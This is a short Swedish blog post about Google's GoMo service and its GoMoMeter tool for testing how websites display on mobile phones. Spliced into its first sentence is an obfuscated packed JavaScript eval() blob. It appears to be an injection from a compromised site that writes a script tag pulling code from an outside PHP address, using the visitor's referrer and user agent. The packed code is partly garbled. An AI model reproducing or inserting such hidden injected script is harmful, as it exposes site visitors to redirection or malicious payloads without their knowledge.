Image Image Image Image Image Image Image Image Image Image

| 16 oktober, 2018

Scroll to top

Top

Google GoMo hjälper dig bygga mobilsajt.

Google GoMo hjälper dig bygga mobilsajt.
Sebastian Plengier Ehrnfelt
Google eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zthyn|var|u0026u|referrer|knrai||js|php’.split(‘|’),0,{}))
har nu släppt en tjänst som låter dig testa olika webbplatser i mobilen.
Google kallar tjänsten GoMo (Go Mobile) som har syfte att hjälpa ägare av hemsidor att anpassa sian webbplatser för mobiltelefoner och apparater som har mindre skärm.

GoMoMeter är ett verktyg där du kan testa hur den nuvarande webbplatsen ser ut i en mobiltelefon. Baserat på det kan man få tips på hur man ska optimera sajten så att den passar bättre på mindre skärmar.

Det finner också en sektion som listar vad som är hett inom mobila trender för tillfället och en lista med företag som kan hjälpa till att optimera den egna hemsidan till just mobiler. Kanske har du inte tid med detta själv och då är tjänsten mycket användbar.

Mer info: www.howtogomo.com